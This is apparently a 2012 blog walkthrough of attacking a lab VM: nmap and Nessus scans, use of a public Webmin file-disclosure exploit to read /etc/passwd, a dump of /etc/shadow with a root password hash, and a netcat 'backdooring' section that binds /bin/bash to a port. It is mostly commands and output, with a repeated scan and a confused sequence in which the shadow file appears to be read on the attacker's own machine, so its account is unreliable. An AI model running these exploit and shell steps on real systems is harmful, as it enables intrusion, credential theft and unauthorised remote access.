Nothing Imposible: Privillege Escalation

A. Information Gathering and Service Enumeration

1.scan dengan nmap

root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT

NSE: Loaded 87 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 19:31

Scanning 192.168.0.112 [1 port]

Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 19:31

Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed

Initiating SYN Stealth Scan at 19:32

Scanning 192.168.0.112 [1000 ports]

Discovered open port 445/tcp on 192.168.0.112

Discovered open port 80/tcp on 192.168.0.112

Discovered open port 22/tcp on 192.168.0.112

Discovered open port 139/tcp on 192.168.0.112

Discovered open port 10000/tcp on 192.168.0.112

Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)

Initiating Service scan at 19:32

Scanning 5 services on 192.168.0.112

Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)

Initiating OS detection (try #1) against 192.168.0.112

NSE: Script scanning 192.168.0.112.

Initiating NSE at 19:32

Completed NSE at 19:32, 10.40s elapsed

Nmap scan report for 192.168.0.112

Host is up (0.00070s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)

|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)

80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

|_http-title: Site doesn't have a title (text/html).

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

10000/tcp open http MiniServ 0.01 (Webmin httpd)

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:kernel:2.6.22

OS details: Linux 2.6.22 (embedded, ARM)

Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=199 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:

| nbstat:

| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

| Names

| UBUNTUVM<00> Flags: <unique><active>

| UBUNTUVM<03> Flags: <unique><active>

| UBUNTUVM<20> Flags: <unique><active>

| MSHOME<1e> Flags: <group><active>

|_ MSHOME<00> Flags: <group><active>

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Unix (Samba 3.0.26a)

| Computer name: ubuntuvm

| Domain name: nsdlab

| FQDN: ubuntuvm.NSDLAB

| NetBIOS computer name:

|_ System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE

HOP RTT ADDRESS

1 0.70 ms 192.168.0.112

NSE: Script Post-scanning.

Initiating NSE at 19:32

Completed NSE at 19:32, 0.00s elapsed

Read data files from: /usr/local/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds

Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)

2. scan with nessus

NESSUS REPORT

List of PlugIn IDs

The following plugin IDs have problems associated with them. Select the ID to review more detail.

PLUGIN ID#	#	PLUGIN NAME	SEVERITY
32314	1	Debian OpenSSH/OpenSSL Package Random Number Generator Weakness	High Severity problem(s) found

PORT SSH (22/TCP)

Plugin ID: 32314

Debian OpenSSH/OpenSSL Package Random Number Generator Weakness

Synopsis

 The remote SSH host keys are weak.

List of Hosts

  192.168.0.112

Description

 The remote SSH host key has been generated on a Debian

or Ubuntu system which contains a bug in the random number

generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all

sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote

key and use this to set up decipher the remote session or

set up a man in the middle attack.

Solution

 Consider all cryptographic material generated on the remote host

to be guessable. In particuliar, all SSH, SSL and OpenVPN key

material should be re-generated.

See also

 http://www.nessus.org/u?5d01bdab

http://www.nessus.org/u?f14f4224

Risk Factor

 Critical/ CVSS Base Score: 10.0

(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVSS Temporal Score: 8.3(CVSS2#E:F/RL:OF/RC:C)

CVE  CVE-2008-0166

Bugtraq ID

 29179

Other References  OSVDB:45029

CWE:310

Plugin publication date: 2008/05/14

Plugin last modification date: 2011/03/21

Ease of exploitability : Exploits are available

Exploitable with: Core Impact

192.168.0.112
Scan Time
Start time:	Mon Jan 30 19:31:52 2012
End time:	Mon Jan 30 19:36:04 2012
Number of vulnerabilities
High	1
Medium	5
Low	38

Remote Host Information
Operating System:	Linux Kernel 2.6
NetBIOS name:	UBUNTUVM
IP address:	192.168.0.112
MAC addresses:	08:00:27:aa:ec:6d

root@BT:~# nmap -v -sN 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:29 WIT

Initiating ARP Ping Scan at 19:29

Scanning 192.168.0.112 [1 port]

Completed ARP Ping Scan at 19:29, 0.06s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 19:29

Completed Parallel DNS resolution of 1 host. at 19:29, 13.00s elapsed

Initiating NULL Scan at 19:29

Scanning 192.168.0.112 [1000 ports]

Completed NULL Scan at 19:30, 2.37s elapsed (1000 total ports)

Nmap scan report for 192.168.0.112

Host is up (0.0022s latency).

Not shown: 995 closed ports

PORT STATE SERVICE

22/tcp open|filtered ssh

80/tcp open|filtered http

139/tcp open|filtered netbios-ssn

445/tcp open|filtered microsoft-ds

10000/tcp open|filtered snet-sensor-mgmt

MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds

Raw packets sent: 1017 (40.668KB) | Rcvd: 996 (39.828KB)

root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT

NSE: Loaded 87 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 19:31

Scanning 192.168.0.112 [1 port]

Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 19:31

Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed

Initiating SYN Stealth Scan at 19:32

Scanning 192.168.0.112 [1000 ports]

Discovered open port 445/tcp on 192.168.0.112

Discovered open port 80/tcp on 192.168.0.112

Discovered open port 22/tcp on 192.168.0.112

Discovered open port 139/tcp on 192.168.0.112

Discovered open port 10000/tcp on 192.168.0.112

Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)

Initiating Service scan at 19:32

Scanning 5 services on 192.168.0.112

Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)

Initiating OS detection (try #1) against 192.168.0.112

NSE: Script scanning 192.168.0.112.

Initiating NSE at 19:32

Completed NSE at 19:32, 10.40s elapsed

Nmap scan report for 192.168.0.112

Host is up (0.00070s latency).

Not shown: 995 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)

| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)

|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)

80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)

|_http-title: Site doesn't have a title (text/html).

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

10000/tcp open http MiniServ 0.01 (Webmin httpd)

|_http-methods: No Allow or Public header in OPTIONS response (status code 200)

|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:kernel:2.6.22

OS details: Linux 2.6.22 (embedded, ARM)

Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=199 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:

| nbstat:

| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

| Names

| UBUNTUVM<00> Flags: <unique><active>

| UBUNTUVM<03> Flags: <unique><active>

| UBUNTUVM<20> Flags: <unique><active>

| MSHOME<1e> Flags: <group><active>

|_ MSHOME<00> Flags: <group><active>

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Unix (Samba 3.0.26a)

| Computer name: ubuntuvm

| Domain name: nsdlab

| FQDN: ubuntuvm.NSDLAB

| NetBIOS computer name:

|_ System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE

HOP RTT ADDRESS

1 0.70 ms 192.168.0.112

NSE: Script Post-scanning.

Initiating NSE at 19:32

Completed NSE at 19:32, 0.00s elapsed

Read data files from: /usr/local/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds

Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)

1.in the step to write :

root@BT:~# cd /pentest/exploits/exploitdb/

2.type ls to know directory

root@BT:/pentest/exploits/exploitdb# ls

files.csv platforms searchsploit

3. the next write ./searchsploit webmin to know file webnim

root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin

Description Path

--------------------------------------------------------------------------- -------------------------

Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl

Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi

Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt

phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

4. copying file 2017 perl with type cp platforms/multiple/remote/2017.pl ~

root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

5. quit to pentest with type cd

root@BT:/pentest/exploits/exploitdb# cd

6. see the value folder home

root@BT:~# ls

2017.pl NessusReport21.rtf NessusReport45.rtf subnet

Desktop NessusReport26.rtf NessusReport63.rtf VirtualBox VMs

download NessusReport27.rtf NessusReport65.rtf workspace

galau.ps NessusReport32.rtf NessusReport66.rtf xpreport.rtf

galau.txt NessusReport35.rtf NessusReport67.rtf

IS2C NessusReport40.rtf NessusReport70.rtf

Nessus-4.4.1-ubuntu910_i386.deb NessusReport44.rtf NessusReport.rtf

7. see file 2017.pl

root@BT:~# perl 2017.pl

Usage: 2017.pl <url> <port> <filename> <target>

TARGETS are

0 - > HTTP

1 - > HTTPS

Define full path with file name

Example: ./webmin.pl blah.com 10000 /etc/passwd

root@BT:~# perl 2017.pl 192.168.0.112 10000

Usage: 2017.pl <url> <port> <filename> <target>

TARGETS are

0 - > HTTP

1 - > HTTPS

Define full path with file name

Example: ./webmin.pl blah.com 10000 /etc/passwd

8.Open the encryption of password and user name, with type:perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0

root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0

WEBMIN EXPLOIT !!!!! coded by UmZ!

Comments and Suggestions are welcome at umz32.dll [at] gmail.com

Vulnerability disclose at securitydot.net

I am just coding it in perl 'cuz I hate PHP!

Attacking http://192.168.0.112 on port 10000!

FILENAME: /etc/passwd

FILE CONTENT STARTED

-----------------------------------

-------------------------------------

9. Show all the username and password in shadow folder, type : cat /etc/shadow

root@BT:~# cat /etc/shadow

root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::

daemon:x:15362:0:99999:7:::

bin:x:15362:0:99999:7:::

sys:x:15362:0:99999:7:::

sync:x:15362:0:99999:7:::

games:x:15362:0:99999:7:::

man:x:15362:0:99999:7:::

lp:x:15362:0:99999:7:::

mail:x:15362:0:99999:7:::

news:x:15362:0:99999:7:::

uucp:x:15362:0:99999:7:::

proxy:x:15362:0:99999:7:::

www-data:x:15362:0:99999:7:::

backup:x:15362:0:99999:7:::

list:x:15362:0:99999:7:::

irc:x:15362:0:99999:7:::

gnats:x:15362:0:99999:7:::

libuuid:x:15362:0:99999:7:::

syslog:x:15362:0:99999:7:::

sshd:x:15362:0:99999:7:::

landscape:x:15362:0:99999:7:::

messagebus:x:15362:0:99999:7:::

nobody:x:15362:0:99999:7:::

mysql:!:15362:0:99999:7:::

avahi:*:15362:0:99999:7:::

snort:*:15362:0:99999:7:::

statd:*:15362:0:99999:7:::

haldaemon:*:15362:0:99999:7:::

kdm:*:15362:0:99999:7:::

festival:*:15362:0:99999:7:::

usbmux:*:15362:0:99999:7:::

postgres:!:15362:0:99999:7:::

privoxy:*:15362:0:99999:7:::

debian-tor:*:15362:0:99999:7:::

clamav:!:15362:0:99999:7:::

backdooring

1. nc -l -p 1234

2. nc localhost 1234 -e /bin/bash

Nothing Imposible

Daftar Blog Saya

Senin, 30 Januari 2012

Privillege Escalation

Tidak ada komentar:

Posting Komentar